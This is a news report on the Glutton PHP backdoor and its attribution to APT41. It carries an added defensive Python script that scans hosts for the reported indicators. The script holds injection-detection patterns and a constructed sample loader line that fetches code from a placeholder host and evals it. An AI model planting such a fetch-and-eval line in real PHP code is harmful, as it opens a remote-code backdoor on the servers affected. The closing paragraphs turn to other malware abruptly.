Cybersecurity researchers have discovered a new PHP-based backdoor named Glutton which has been used in cyberattacks against China, the United States, Cambodia, Pakistan, and South Africa.
QiAnXin XLab, which discovered the malware in late April 2024, attributed the previously unknown malware to the prolific Chinese state-owned group Winnti (aka APT41) with moderate confidence.
“Interestingly, our investigation revealed that the creators of Glutton deliberately targeted systems in the cybercrime market,” the company said in a statement. “With poisoning operations, they sought to turn cybercriminals’ tools against themselves — a classic ‘no honor among thieves’ scenario.”
Glutton is designed to collect sensitive system information, remove ELF backdoor components, and inject code into popular PHP frameworks such as Baota (BT), ThinkPHP, Yii, and Laravel. The ELF malware also bears “almost complete similarity” to the well-known Winnti tool known as PWNLNX.
Despite the links to Winnti, XLab said it could not definitively link the backdoor to an adversary due to the lack of stealth techniques commonly associated with the group. The cybersecurity company called the flaws “uncharacteristic.”
This includes the absence of encrypted command-and-control (C2) communications, the use of HTTP (instead of HTTPS) to download payloads, and the fact that the samples are free of any obfuscation.
Essentially, Glutton is a modular malware system capable of infecting PHP files on target devices as well as installing backdoors. Initial access is believed to be achieved by exploiting zero-day and N-day flaws and brute force attacks.
Another unconventional approach involves advertising compromised enterprise hosts on cybercrime forums. These hosts already contain l0ader_shell, a backdoor injected into PHP files, which effectively lets the operators launch attacks against the other cybercriminals who buy access to them.
The main module driving the attack is “task_loader”, which evaluates the runtime environment and retrieves additional components. One of these is “init_task”, which loads an ELF-based backdoor masquerading as FastCGI Process Manager (“/lib/php-fpm”), infects PHP files with malicious code to execute further payloads, collects sensitive information, and modifies system files.
The attack chain also includes a module called “client_loader”, a reengineered version of “init_task” that uses updated network infrastructure and adds the ability to download and run a backdoor client. It modifies system files such as “/etc/init.d/network” to establish persistence.
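The indicators described so far lend themselves to a simple host triage: an ELF executable sitting at the path the backdoor masquerades under, a recently modified init script of the kind client_loader edits, and PHP files in web-framework directories that carry injected loader code. The script below is an added example written for this page, not XLab's tooling or anything from the Glutton samples. It assumes the paths named above; only the “l0ader_shell” string comes from the page, while the other two heuristics (eval over a decoder, and a cleartext HTTP fetch, which matches the unencrypted download behaviour XLab noted) are generic assumptions an analyst would tune. The PHP tree it scans is constructed inside the script so it runs offline.

```python
# Added example: host triage for the Glutton indicators named on this page
# (masquerading "/lib/php-fpm", edited "/etc/init.d/network", injected PHP).
# Written for this article, not XLab's code; heuristics beyond "l0ader_shell"
# are assumptions, and the scanned PHP tree is constructed sample data.
import os
import re
import tempfile
import time
from pathlib import Path

SUSPICIOUS_BINARY = "/lib/php-fpm"       # genuine php-fpm normally lives under /usr/sbin
PERSISTENCE_FILE = "/etc/init.d/network" # init script the article says client_loader edits
ELF_MAGIC = b"\x7fELF"

# Injection heuristics for PHP sources. Only "l0ader_shell" is from the page;
# the other two are generic web-shell tells (assumed, not Glutton-specific).
INJECTION_PATTERNS = {
    "l0ader_shell": re.compile(r"l0ader_shell"),
    "eval_decode": re.compile(r"eval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\("),
    "http_fetch": re.compile(r"(?:file_get_contents|curl_init)\s*\(\s*['\"]http://"),
}


def scan_php_file(path: Path) -> list[str]:
    """Return the names of the heuristics that match one PHP file."""
    try:
        text = path.read_text(encoding="utf-8", errors="replace")
    except OSError:
        return []
    return [name for name, rx in INJECTION_PATTERNS.items() if rx.search(text)]


def scan_php_tree(root: Path) -> dict[str, list[str]]:
    """Walk a web root (e.g. a ThinkPHP/Laravel install) and map flagged .php files to hits."""
    hits: dict[str, list[str]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if fn.endswith(".php"):
                p = Path(dirpath) / fn
                matched = scan_php_file(p)
                if matched:
                    hits[p.relative_to(root).as_posix()] = matched
    return hits


def check_binary(path: str = SUSPICIOUS_BINARY) -> bool:
    """True if an ELF executable sits at the path the backdoor masquerades under."""
    p = Path(path)
    if not p.is_file():
        return False
    with p.open("rb") as fh:
        return fh.read(4) == ELF_MAGIC


def check_init_script(path: str = PERSISTENCE_FILE, max_age_days: int = 30) -> bool:
    """True if the init script changed recently: a tamper hint for an analyst, not proof."""
    p = Path(path)
    if not p.is_file():
        return False
    return (time.time() - p.stat().st_mtime) < max_age_days * 86400


def demo() -> dict[str, list[str]]:
    """Build a constructed fake framework tree (one clean file, one injected) and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        app = root / "thinkphp" / "public"
        app.mkdir(parents=True)
        (app / "index.php").write_text(
            "<?php\nrequire __DIR__ . '/../vendor/autoload.php';\n"
        )
        (app / "router.php").write_text(
            "<?php\n// constructed sample of an injected loader, not real malware\n"
            "$l0ader_shell = file_get_contents('http://example.invalid/p.txt');\n"
            "eval(base64_decode($l0ader_shell));\n"
        )
        return scan_php_tree(root)


if __name__ == "__main__":
    for f, tags in demo().items():
        print(f"{f}: {', '.join(tags)}")
    print("masquerading php-fpm present:", check_binary())
    print("init script recently modified:", check_init_script())
```

Run it as root on a suspect host and point `scan_php_tree` at the real web roots (the Baota, ThinkPHP, Yii and Laravel installs the article names); a file that triggers all three heuristics, or an ELF at `/lib/php-fpm`, is worth pulling for manual analysis rather than an automatic verdict.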
The PHP backdoor is full-featured and supports 22 unique commands that allow operators to switch C2 connections between TCP and UDP, run a shell, download/upload files, perform file and directory operations, and run arbitrary PHP code. In addition, the framework can fetch and run more PHP payloads by periodically polling the C2 server.
“These payloads are highly modular, able to function independently or be executed sequentially through a task_loader to form a complex attack framework,” XLab said. “All code execution takes place in PHP or PHP-FPM (FastCGI) processes, ensuring that no file payloads are left behind, thus achieving a hidden footprint.”
Another notable aspect is the use of HackBrowserData, a tool deployed on systems used by cybercriminal operators to steal sensitive information, possibly to inform future phishing or social engineering campaigns.
“In addition to targeting traditional white hat victims through cybercrime, Glutton demonstrates a strategic focus on exploiting cybercrime resource operators,” XLab said. “This creates a recursive chain of attacks, leveraging the attackers’ own activities against them.”
The disclosure comes weeks after XLab detailed an updated version of the APT41 malware called Clefairy which adds improved storage mechanisms and “embeds an RC4-encrypted kernel driver to mask traces of files, processes, and network connections.”
Once installed, the Linux backdoor is equipped to communicate with the C2 server to receive and execute a variety of commands, including gathering device and process information, running a shell, managing processes, performing file and directory operations, and self-removal.
“Mélofée offers simple functionality with very effective stealth capabilities,” it said. “Examples of this malware family are rare, suggesting that attackers may limit its use to high-value targets.”